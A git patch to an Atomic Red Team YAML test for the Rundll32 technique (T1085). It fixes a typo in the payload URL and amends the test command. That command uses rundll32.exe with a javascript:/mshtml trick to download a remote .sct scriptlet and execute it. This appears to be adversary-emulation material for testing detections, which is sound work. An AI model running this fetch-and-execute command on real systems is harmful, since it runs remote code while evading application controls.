From d8ac8e8be9ffd663e76ffa533d2cf38862c3a72d Mon Sep 17 00:00:00 2001 From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com> Date: Wed, 20 Jun 2018 11:40:32 -0600 Subject: [PATCH] Fix cmdline --- atomics/T1085/T1085.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1085/T1085.yaml b/atomics/T1085/T1085.yaml index d6a37515..7aba52cf 100644 --- a/atomics/T1085/T1085.yaml +++ b/atomics/T1085/T1085.yaml @@ -11,8 +11,8 @@ atomic_tests: file_url: description: location of the payload type: Url - default: hhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct executor: name: command_prompt command: | - rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")" + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"